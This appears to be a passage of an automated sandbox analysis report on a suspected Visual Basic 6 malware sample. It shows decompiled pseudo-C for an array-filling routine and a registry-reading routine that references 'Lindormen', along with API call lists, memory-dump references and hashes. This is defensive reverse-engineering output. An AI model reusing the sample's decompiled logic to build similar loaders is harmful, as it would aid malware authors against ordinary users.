                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0xa;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v132 = _t226;
                            				} else {
                            					_v132 = _v132 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0xb;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v136 = _t226;
                            				} else {
                            					_v136 = _v136 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0xc;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v140 = _t226;
                            				} else {
                            					_v140 = _v140 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0xd;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v144 = _t226;
                            				} else {
                            					_v144 = _v144 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0xe;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v148 = _t226;
                            				} else {
                            					_v148 = _v148 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0xf;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v152 = _t226;
                            				} else {
                            					_v152 = _v152 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x10;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v156 = _t226;
                            				} else {
                            					_v156 = _v156 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x11;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v160 = _t226;
                            				} else {
                            					_v160 = _v160 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x12;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v164 = _t226;
                            				} else {
                            					_v164 = _v164 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x13;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v168 = _t226;
                            				} else {
                            					_v168 = _v168 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x14;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v172 = _t226;
                            				} else {
                            					_v172 = _v172 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x15;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v176 = _t226;
                            				} else {
                            					_v176 = _v176 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x16;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v180 = _t226;
                            				} else {
                            					_v180 = _v180 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x17;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v184 = _t226;
                            				} else {
                            					_v184 = _v184 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x18;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v188 = _t226;
                            				} else {
                            					_v188 = _v188 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x19;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v192 = _t226;
                            				} else {
                            					_v192 = _v192 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x1a;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v196 = _t226;
                            				} else {
                            					_v196 = _v196 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x1b;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v200 = _t226;
                            				} else {
                            					_v200 = _v200 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_v80 = 0x1c;
                            				if(_v80 >= 0x1d) {
                            					L0040139C();
                            					_v204 = _t226;
                            				} else {
                            					_v204 = _v204 & 0x00000000;
                            				}
                            				L00401396();
                            				 *((char*)(_v56 + _v80)) = _t226;
                            				_push(E0040E376);
                            				L00401450();
                            				L00401462();
                            				_v76 =  &_v68;
                            				_t228 =  &_v76;
                            				_push(_t228);
                            				_push(0);
                            				L00401390();
                            				return _t228;
                            			}














































                            0x0040dd85
                            0x0040dd94
                            0x0040dda0
                            0x0040dda8
                            0x0040ddab
                            0x0040ddb2
                            0x0040ddc1
                            0x0040ddca
                            0x0040ddd5
                            0x0040ddda
                            0x0040dddc
                            0x0040dde1
                            0x0040dde4
                            0x0040dde5
                            0x0040ddea
                            0x0040ddf2
                            0x0040ddfa
                            0x0040ddff
                            0x0040ddf4
                            0x0040ddf4
                            0x0040ddf4
                            0x0040de06
                            0x0040de11
                            0x0040de13
                            0x0040de1e
                            0x0040de26
                            0x0040de2b
                            0x0040de20
                            0x0040de20
                            0x0040de20
                            0x0040de32
                            0x0040de3d
                            0x0040de3f
                            0x0040de4a
                            0x0040de52
                            0x0040de57
                            0x0040de4c
                            0x0040de4c
                            0x0040de4c
                            0x0040de5e
                            0x0040de69
                            0x0040de6b
                            0x0040de76
                            0x0040de7e
                            0x0040de83
                            0x0040de78
                            0x0040de78
                            0x0040de78
                            0x0040de8a
                            0x0040de95
                            0x0040de97
                            0x0040dea2
                            0x0040deaa
                            0x0040deaf
                            0x0040dea4
                            0x0040dea4
                            0x0040dea4
                            0x0040deb6
                            0x0040dec1
                            0x0040dec3
                            0x0040dece
                            0x0040ded6
                            0x0040dedb
                            0x0040ded0
                            0x0040ded0
                            0x0040ded0
                            0x0040dee2
                            0x0040deed
                            0x0040deef
                            0x0040defa
                            0x0040df02
                            0x0040df07
                            0x0040defc
                            0x0040defc
                            0x0040defc
                            0x0040df0e
                            0x0040df19
                            0x0040df1b
                            0x0040df26
                            0x0040df2e
                            0x0040df33
                            0x0040df28
                            0x0040df28
                            0x0040df28
                            0x0040df3a
                            0x0040df45
                            0x0040df47
                            0x0040df52
                            0x0040df5a
                            0x0040df5f
                            0x0040df54
                            0x0040df54
                            0x0040df54
                            0x0040df66
                            0x0040df71
                            0x0040df73
                            0x0040df7e
                            0x0040df86
                            0x0040df8b
                            0x0040df80
                            0x0040df80
                            0x0040df80
                            0x0040df92
                            0x0040df9d
                            0x0040df9f
                            0x0040dfaa
                            0x0040dfb2
                            0x0040dfb7
                            0x0040dfac
                            0x0040dfac
                            0x0040dfac
                            0x0040dfbe
                            0x0040dfc9
                            0x0040dfcb
                            0x0040dfd6
                            0x0040dfe1
                            0x0040dfe6
                            0x0040dfd8
                            0x0040dfd8
                            0x0040dfd8
                            0x0040dff0
                            0x0040dffb
                            0x0040dffd
                            0x0040e008
                            0x0040e013
                            0x0040e018
                            0x0040e00a
                            0x0040e00a
                            0x0040e00a
                            0x0040e022
                            0x0040e02d
                            0x0040e02f
                            0x0040e03a
                            0x0040e045
                            0x0040e04a
                            0x0040e03c
                            0x0040e03c
                            0x0040e03c
                            0x0040e054
                            0x0040e05f
                            0x0040e061
                            0x0040e06c
                            0x0040e077
                            0x0040e07c
                            0x0040e06e
                            0x0040e06e
                            0x0040e06e
                            0x0040e086
                            0x0040e091
                            0x0040e093
                            0x0040e09e
                            0x0040e0a9
                            0x0040e0ae
                            0x0040e0a0
                            0x0040e0a0
                            0x0040e0a0
                            0x0040e0b8
                            0x0040e0c3
                            0x0040e0c5
                            0x0040e0d0
                            0x0040e0db
                            0x0040e0e0
                            0x0040e0d2
                            0x0040e0d2
                            0x0040e0d2
                            0x0040e0ea
                            0x0040e0f5
                            0x0040e0f7
                            0x0040e102
                            0x0040e10d
                            0x0040e112
                            0x0040e104
                            0x0040e104
                            0x0040e104
                            0x0040e11c
                            0x0040e127
                            0x0040e129
                            0x0040e134
                            0x0040e13f
                            0x0040e144
                            0x0040e136
                            0x0040e136
                            0x0040e136
                            0x0040e14e
                            0x0040e159
                            0x0040e15b
                            0x0040e166
                            0x0040e171
                            0x0040e176
                            0x0040e168
                            0x0040e168
                            0x0040e168
                            0x0040e180
                            0x0040e18b
                            0x0040e18d
                            0x0040e198
                            0x0040e1a3
                            0x0040e1a8
                            0x0040e19a
                            0x0040e19a
                            0x0040e19a
                            0x0040e1b2
                            0x0040e1bd
                            0x0040e1bf
                            0x0040e1ca
                            0x0040e1d5
                            0x0040e1da
                            0x0040e1cc
                            0x0040e1cc
                            0x0040e1cc
                            0x0040e1e4
                            0x0040e1ef
                            0x0040e1f1
                            0x0040e1fc
                            0x0040e207
                            0x0040e20c
                            0x0040e1fe
                            0x0040e1fe
                            0x0040e1fe
                            0x0040e216
                            0x0040e221
                            0x0040e223
                            0x0040e22e
                            0x0040e239
                            0x0040e23e
                            0x0040e230
                            0x0040e230
                            0x0040e230
                            0x0040e248
                            0x0040e253
                            0x0040e255
                            0x0040e260
                            0x0040e26b
                            0x0040e270
                            0x0040e262
                            0x0040e262
                            0x0040e262
                            0x0040e27a
                            0x0040e285
                            0x0040e287
                            0x0040e292
                            0x0040e29d
                            0x0040e2a2
                            0x0040e294
                            0x0040e294
                            0x0040e294
                            0x0040e2ac
                            0x0040e2b7
                            0x0040e2b9
                            0x0040e2c4
                            0x0040e2cf
                            0x0040e2d4
                            0x0040e2c6
                            0x0040e2c6
                            0x0040e2c6
                            0x0040e2de
                            0x0040e2e9
                            0x0040e2eb
                            0x0040e2f6
                            0x0040e301
                            0x0040e306
                            0x0040e2f8
                            0x0040e2f8
                            0x0040e2f8
                            0x0040e310
                            0x0040e31b
                            0x0040e31d
                            0x0040e328
                            0x0040e333
                            0x0040e338
                            0x0040e32a
                            0x0040e32a
                            0x0040e32a
                            0x0040e342
                            0x0040e34d
                            0x0040e34f
                            0x0040e357
                            0x0040e35f
                            0x0040e367
                            0x0040e36a
                            0x0040e36d
                            0x0040e36e
                            0x0040e370
                            0x0040e375

                            APIs
                            • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040DDA0
                            • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040DDCA
                            • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040DDD5
                            • __vbaAryConstruct2.MSVBVM60(?,0040B2C8,00000011,?,?,?,?,004012A6), ref: 0040DDE5
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DDFA
                            • __vbaUI1I2.MSVBVM60 ref: 0040DE06
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DE26
                            • __vbaUI1I2.MSVBVM60 ref: 0040DE32
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DE52
                            • __vbaUI1I2.MSVBVM60 ref: 0040DE5E
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DE7E
                            • __vbaUI1I2.MSVBVM60 ref: 0040DE8A
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DEAA
                            • __vbaUI1I2.MSVBVM60 ref: 0040DEB6
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DED6
                            • __vbaUI1I2.MSVBVM60 ref: 0040DEE2
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DF02
                            • __vbaUI1I2.MSVBVM60 ref: 0040DF0E
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DF2E
                            • __vbaUI1I2.MSVBVM60 ref: 0040DF3A
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DF5A
                            • __vbaUI1I2.MSVBVM60 ref: 0040DF66
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DF86
                            • __vbaUI1I2.MSVBVM60 ref: 0040DF92
                            • __vbaUI1I2.MSVBVM60 ref: 0040DFBE
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DFE1
                            • __vbaUI1I2.MSVBVM60 ref: 0040DFF0
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E013
                            • __vbaUI1I2.MSVBVM60 ref: 0040E022
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E045
                            • __vbaUI1I2.MSVBVM60 ref: 0040E054
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E077
                            • __vbaUI1I2.MSVBVM60 ref: 0040E086
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E0A9
                            • __vbaUI1I2.MSVBVM60 ref: 0040E0B8
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E0DB
                            • __vbaUI1I2.MSVBVM60 ref: 0040E0EA
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E10D
                            • __vbaUI1I2.MSVBVM60 ref: 0040E11C
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E13F
                            • __vbaUI1I2.MSVBVM60 ref: 0040E14E
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E171
                            • __vbaUI1I2.MSVBVM60 ref: 0040E180
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E1A3
                            • __vbaUI1I2.MSVBVM60 ref: 0040E1B2
                            • __vbaUI1I2.MSVBVM60 ref: 0040E1E4
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E207
                            • __vbaUI1I2.MSVBVM60 ref: 0040E216
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E239
                            • __vbaUI1I2.MSVBVM60 ref: 0040E248
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E26B
                            • __vbaUI1I2.MSVBVM60 ref: 0040E27A
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E29D
                            • __vbaUI1I2.MSVBVM60 ref: 0040E2AC
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E2CF
                            • __vbaUI1I2.MSVBVM60 ref: 0040E2DE
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E301
                            • __vbaUI1I2.MSVBVM60 ref: 0040E310
                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E333
                            • __vbaUI1I2.MSVBVM60 ref: 0040E342
                            • __vbaFreeVar.MSVBVM60(0040E376), ref: 0040E357
                            • __vbaFreeStr.MSVBVM60(0040E376), ref: 0040E35F
                            • __vbaAryDestruct.MSVBVM60(00000000,?,0040E376), ref: 0040E370
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __vba$BoundsErrorGenerate$Free$ChkstkConstruct2CopyDestruct
                            • String ID:
                            • API String ID: 1600147872-0
                            • Opcode ID: c689ab9657758ba5643b4232e735675987b817e87efe1c75636107e4f3eb6d13
                            • Instruction ID: f1f247702b542d8ae6df6b14a35e0c0dd7924953fdcc55cc19cb31b9f35b993e
                            • Opcode Fuzzy Hash: c689ab9657758ba5643b4232e735675987b817e87efe1c75636107e4f3eb6d13
                            • Instruction Fuzzy Hash: CD02B070C02208CFEB20EBA6C5557ACBBB1AF15319F1484AFD816B7692C778154ACF1B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 54%
                            			E0040BC74(void* __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, signed int _a24) {
                            				intOrPtr _v4;
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				char _v24;
                            				char* _v28;
                            				char* _v32;
                            				void* _v36;
                            				signed int _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				char _v60;
                            				signed int _v68;
                            				char _v76;
                            				intOrPtr _v84;
                            				char _v92;
                            				short _v100;
                            				char _v108;
                            				char _v124;
                            				char _v140;
                            				char* _v148;
                            				char _v156;
                            				intOrPtr _v196;
                            				char _v204;
                            				char* _v208;
                            				short _v212;
                            				char* _v216;
                            				signed int _v220;
                            				signed int _v224;
                            				char* _v236;
                            				intOrPtr* _v240;
                            				intOrPtr _v252;
                            				void* _v260;
                            				void* _t163;
                            				char* _t169;
                            				void* _t170;
                            				char* _t171;
                            				char* _t174;
                            				char* _t177;
                            				signed short _t186;
                            				char* _t198;
                            				intOrPtr _t199;
                            				signed int _t201;
                            				short _t212;
                            				char* _t217;
                            				intOrPtr _t224;
                            				void* _t227;
                            				void* _t230;
                            				void* _t234;
                            				char* _t239;
                            				void* _t263;
                            				void* _t266;
                            				void* _t267;
                            				void* _t268;
                            				void* _t270;
                            				intOrPtr _t271;
                            				void* _t272;
                            				intOrPtr* _t273;
                            
                            				_t266 = __esi;
                            				_t263 = __edi;
                            				_t234 = __ebx;
                            				_t268 = _t270;
                            				_t271 = _t270 - 0xc;
                            				asm("cmpsb");
                            				asm("adc al, [eax]");
                            				 *[fs:0x0] = _t271;
                            				 *0xd8 =  *0xd8 + 0xd8;
                            				 *(__esi - 1) =  *(__esi - 1) | __edx;
                            				_t163 =  *((intOrPtr*)(__ebx + 0x56))();
                            				_v12 = _t271;
                            				_v8 = 0x401150;
                            				_v4 = 0;
                            				 *0xd8 =  *0xd8 + _t163;
                            				 *((intOrPtr*)( *_a8 + 4))(_a8, __edi,  *[fs:0x0], _t267);
                            				_push( &_v24);
                            				_push(0x2003f);
                            				_push(0);
                            				_push( *_a16);
                            				_t169 =  &_v56;
                            				_push(_t169);
                            				L00401474();
                            				_push(_t169);
                            				_t170 = _a12;
                            				_push( *_t170);
                            				E0040B0A8();
                            				_v208 = _t170;
                            				L0040146E();
                            				_push(_v56);
                            				_push(_a16);
                            				L00401468();
                            				_t171 = _v208;
                            				_v32 = _t171;
                            				L00401462();
                            				if(_v32 == 0) {
                            					_v68 = _v68 & 0x00000000;
                            					_v76 = 2;
                            					_push( &_v76);
                            					_push(0x400);
                            					L00401456();
                            					L0040145C();
                            					L00401450();
                            					_v52 = 0x400;
                            					_push( &_v52);
                            					_push(_v48);
                            					_t174 =  &_v60;
                            					_push(_t174);
                            					L00401474();
                            					_push(_t174);
                            					_push( &_v36);
                            					_push(0);
                            					_push( *_a20);
                            					_t177 =  &_v56;
                            					_push(_t177);
                            					L00401474();
                            					_push(_t177);
                            					_push(_v24);
                            					E0040B118();
                            					_v208 = _t177;
                            					L0040146E();
                            					_push(_v56);
                            					_push(_a20);
                            					L00401468();
                            					_push(_v60);
                            					_push( &_v48);
                            					L00401468();
                            					_v32 = _v208;
                            					_push( &_v60);
                            					_t171 =  &_v56;
                            					_push(_t171);
                            					_push(2);
                            					L0040144A();
                            					_t272 = _t271 + 0xc;
                            					if(_v32 == 0) {
                            						_v68 = 1;
                            						_v76 = 2;
                            						_v148 =  &_v48;
                            						_v156 = 0x4008;
                            						_push( &_v76);
                            						_push(_v52);
                            						_push( &_v156);
                            						_push( &_v92);
                            						L00401438();
                            						_push( &_v92);
                            						_t186 =  &_v56;
                            						_push(_t186);
                            						L0040143E();
                            						_push(_t186);
                            						L00401444();
                            						asm("sbb eax, eax");
                            						_v212 =  ~( ~_t186 + 1);
                            						_t239 =  &_v56;
                            						L00401462();
                            						_push( &_v92);
                            						_push( &_v76);
                            						_push(2);
                            						L00401432();
                            						_t273 = _t272 + 0xc;
                            						if(_v212 == 0) {
                            							_v148 =  &_v48;
                            							_v156 = 0x4008;
                            							_push(_v52);
                            							_push( &_v156);
                            							_push( &_v76);
                            							L00401426();
                            							_push( &_v76);
                            							L0040142C();
                            							L0040145C();
                            							L00401450();
                            							goto L17;
                            						} else {
                            							_v148 =  &_v48;
                            							_v156 = 0x4008;
                            							_t230 = _v52 - 1;
                            							if(_t230 < 0) {
                            								L31:
                            								L004013FC();
                            								 *[fs:0x0] = _t273;
                            								L004012A0();
                            								_v240 = _t273;
                            								_v236 = 0x401160;
                            								_v252 = 0xa066336a;
                            								_t227 =  *_t273(0x402411, _t263, _t266, _t234, 0x10,  *[fs:0x0], 0x4012a6, _t239, _t239, _t268);
                            								L0040145C();
                            								_push(_v252);
                            								_push(L"Lindormen");
                            								L004013F6();
                            								L0040145C();
                            								_push(_v252);
                            								_push(L"Lindormen");
                            								L004013F6();
                            								L0040145C();
                            								_push(E0040C1A7);
                            								L00401462();
                            								return _t227;
                            							} else {
                            								_push(_t230);
                            								_push( &_v156);
                            								_push( &_v76);
                            								L00401426();
                            								_push( &_v76);
                            								L0040142C();
                            								L0040145C();
                            								L00401450();
                            								L17:
                            								_v216 = _v36;
                            								_t198 = _v216;
                            								_v236 = _t198;
                            								if(_v236 == 1) {
                            									L00401420();
                            									goto L27;
                            								} else {
                            									if(_v236 == 4) {
                            										_v224 = 1;
                            										_v220 = _v220 | 0xffffffff;
                            										_push(_v48);
                            										L0040141A();
                            										_v28 = _t198;
                            										while(_v28 >= _v224) {
                            											_v196 =  *_a24;
                            											_v204 = 8;
                            											_v68 = 1;
                            											_v76 = 2;
                            											_v148 =  &_v48;
                            											_v156 = 0x4008;
                            											_push( &_v76);
                            											_push(_v28);
                            											_push( &_v156);
                            											_push( &_v92);
                            											L00401438();
                            											_push( &_v92);
                            											_t212 =  &_v56;
                            											_push(_t212);
                            											L0040143E();
                            											_push(_t212);
                            											L00401444();
                            											_v100 = _t212;
                            											_v108 = 2;
                            											_push( &_v108);
                            											_push( &_v124);
                            											L0040140E();
                            											_push( &_v204);
                            											_push( &_v124);
                            											_t217 =  &_v140;
                            											_push(_t217);
                            											L00401414();
                            											_push(_t217);
                            											L0040142C();
                            											L0040145C();
                            											_t239 =  &_v56;
                            											L00401462();
                            											_push( &_v140);
                            											_push( &_v124);
                            											_push( &_v108);
                            											_push( &_v92);
                            											_push( &_v76);
                            											_push(5);
                            											L00401432();
                            											_t273 = _t273 + 0x18;
                            											_t224 = _v28 + _v220;
                            											if(_t224 < 0) {
                            												goto L31;
                            											} else {
                            												_v28 = _t224;
                            												continue;
                            											}
                            											goto L32;
                            										}
                            										_v84 = 0x80020004;
                            										_v92 = 0xa;
                            										_push(0x40b1e8);
                            										_t201 = _a24;
                            										_push( *_t201);
                            										L00401402();
                            										_v68 = _t201;
                            										_v76 = 8;
                            										_push(1);
                            										_push(1);
                            										_push( &_v92);
                            										_push( &_v76);
                            										L00401408();
                            										L0040145C();
                            										_push( &_v92);
                            										_t198 =  &_v76;
                            										_push(_t198);
                            										_push(2);
                            										L00401432();
                            										goto L27;
                            									} else {
                            										L27:
                            										_v44 = _v44 | 0x0000ffff;
                            										_push(_v24);
                            										E0040B15C();
                            										_v208 = _t198;
                            										L0040146E();
                            										_t199 = _v208;
                            										_v32 = _t199;
                            										goto L29;
                            									}
                            								}
                            							}
                            						}
                            					} else {
                            						goto L28;
                            					}
                            				} else {
                            					L28:
                            					L00401420();
                            					_v44 = _v44 & 0x00000000;
                            					_push(_v24);
                            					E0040B15C();
                            					_v208 = _t171;
                            					L0040146E();
                            					_t199 = _v208;
                            					_v32 = _t199;
                            					L29:
                            					_push(E0040C0F2);
                            					L00401462();
                            					return _t199;
                            				}
                            				L32:
                            			}





























































                            0x0040bc74
                            0x0040bc74
                            0x0040bc74
                            0x0040bc75
                            0x0040bc77
                            0x0040bc7b
                            0x0040bc7c
                            0x0040bc86
                            0x0040bc8f
                            0x0040bc93
                            0x0040bc96
                            0x0040bc9a
                            0x0040bc9d
                            0x0040bca4
                            0x0040bca9
                            0x0040bcb3
                            0x0040bcb9
                            0x0040bcba
                            0x0040bcbf
                            0x0040bcc4
                            0x0040bcc6
                            0x0040bcc9
                            0x0040bcca
                            0x0040bccf
                            0x0040bcd0
                            0x0040bcd3
                            0x0040bcd5
                            0x0040bcda
                            0x0040bce0
                            0x0040bce5
                            0x0040bce8
                            0x0040bceb
                            0x0040bcf0
                            0x0040bcf6
                            0x0040bcfc
                            0x0040bd05
                            0x0040bd0c
                            0x0040bd10
                            0x0040bd1a
                            0x0040bd1b
                            0x0040bd20
                            0x0040bd2a
                            0x0040bd32
                            0x0040bd37
                            0x0040bd41
                            0x0040bd42
                            0x0040bd45
                            0x0040bd48
                            0x0040bd49
                            0x0040bd4e
                            0x0040bd52
                            0x0040bd53
                            0x0040bd58
                            0x0040bd5a
                            0x0040bd5d
                            0x0040bd5e
                            0x0040bd63
                            0x0040bd64
                            0x0040bd67
                            0x0040bd6c
                            0x0040bd72
                            0x0040bd77
                            0x0040bd7a
                            0x0040bd7d
                            0x0040bd82
                            0x0040bd88
                            0x0040bd89
                            0x0040bd94
                            0x0040bd9a
                            0x0040bd9b
                            0x0040bd9e
                            0x0040bd9f
                            0x0040bda1
                            0x0040bda6
                            0x0040bdad
                            0x0040bdb4
                            0x0040bdbb
                            0x0040bdc5
                            0x0040bdcb
                            0x0040bdd8
                            0x0040bdd9
                            0x0040bde2
                            0x0040bde6
                            0x0040bde7
                            0x0040bdef
                            0x0040bdf0
                            0x0040bdf3
                            0x0040bdf4
                            0x0040bdf9
                            0x0040bdfa
                            0x0040be02
                            0x0040be07
                            0x0040be0e
                            0x0040be11
                            0x0040be19
                            0x0040be1d
                            0x0040be1e
                            0x0040be20
                            0x0040be25
                            0x0040be31
                            0x0040be83
                            0x0040be89
                            0x0040be93
                            0x0040be9c
                            0x0040bea0
                            0x0040bea1
                            0x0040bea9
                            0x0040beaa
                            0x0040beb4
                            0x0040bebc
                            0x00000000
                            0x0040be33
                            0x0040be36
                            0x0040be3c
                            0x0040be49
                            0x0040be4c
                            0x0040c11b
                            0x0040c11b
                            0x0040c131
                            0x0040c13b
                            0x0040c143
                            0x0040c146
                            0x0040c14d
                            0x0040c160
                            0x0040c166
                            0x0040c16b
                            0x0040c16e
                            0x0040c173
                            0x0040c17d
                            0x0040c182
                            0x0040c185
                            0x0040c18a
                            0x0040c194
                            0x0040c199
                            0x0040c1a1
                            0x0040c1a6
                            0x0040be52
                            0x0040be52
                            0x0040be59
                            0x0040be5d
                            0x0040be5e
                            0x0040be66
                            0x0040be67
                            0x0040be71
                            0x0040be79
                            0x0040bec1
                            0x0040bec4
                            0x0040beca
                            0x0040bed0
                            0x0040bedd
                            0x0040bef3
                            0x00000000
                            0x0040bedf
                            0x0040bee6
                            0x0040befd
                            0x0040bf07
                            0x0040bf0e
                            0x0040bf11
                            0x0040bf16
                            0x0040bf2d
                            0x0040bf41
                            0x0040bf47
                            0x0040bf51
                            0x0040bf58
                            0x0040bf62
                            0x0040bf68
                            0x0040bf75
                            0x0040bf76
                            0x0040bf7f
                            0x0040bf83
                            0x0040bf84
                            0x0040bf8c
                            0x0040bf8d
                            0x0040bf90
                            0x0040bf91
                            0x0040bf96
                            0x0040bf97
                            0x0040bf9c
                            0x0040bfa0
                            0x0040bfaa
                            0x0040bfae
                            0x0040bfaf
                            0x0040bfba
                            0x0040bfbe
                            0x0040bfbf
                            0x0040bfc5
                            0x0040bfc6
                            0x0040bfcb
                            0x0040bfcc
                            0x0040bfd6
                            0x0040bfdb
                            0x0040bfde
                            0x0040bfe9
                            0x0040bfed
                            0x0040bff1
                            0x0040bff5
                            0x0040bff9
                            0x0040bffa
                            0x0040bffc
                            0x0040c001
                            0x0040bf1e
                            0x0040bf24
                            0x00000000
                            0x0040bf2a
                            0x0040bf2a
                            0x00000000
                            0x0040bf2a
                            0x00000000
                            0x0040bf24
                            0x0040c009
                            0x0040c010
                            0x0040c017
                            0x0040c01c
                            0x0040c01f
                            0x0040c021
                            0x0040c026
                            0x0040c029
                            0x0040c030
                            0x0040c032
                            0x0040c037
                            0x0040c03b
                            0x0040c03c
                            0x0040c046
                            0x0040c04e
                            0x0040c04f
                            0x0040c052
                            0x0040c053
                            0x0040c055
                            0x00000000
                            0x0040bee8
                            0x0040c05d
                            0x0040c05d
                            0x0040c062
                            0x0040c065
                            0x0040c06a
                            0x0040c070
                            0x0040c075
                            0x0040c07b
                            0x00000000
                            0x0040c07b
                            0x0040bee6
                            0x0040bedd
                            0x0040be4c
                            0x0040bdaf
                            0x00000000
                            0x0040bdaf
                            0x0040bd07
                            0x0040c080
                            0x0040c088
                            0x0040c08d
                            0x0040c092
                            0x0040c095
                            0x0040c09a
                            0x0040c0a0
                            0x0040c0a5
                            0x0040c0ab
                            0x0040c0ae
                            0x0040c0ae
                            0x0040c0ec
                            0x0040c0f1
                            0x0040c0f1
                            0x00000000

                            APIs
                            • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040BC92
                            • __vbaStrToAnsi.MSVBVM60(?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BCCA
                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BCE0
                            • __vbaStrToUnicode.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BCEB
                            • __vbaFreeStr.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BCFC
                            • #606.MSVBVM60(00000400,00000002), ref: 0040BD20
                            • __vbaStrMove.MSVBVM60(00000400,00000002), ref: 0040BD2A
                            • __vbaFreeVar.MSVBVM60(00000400,00000002), ref: 0040BD32
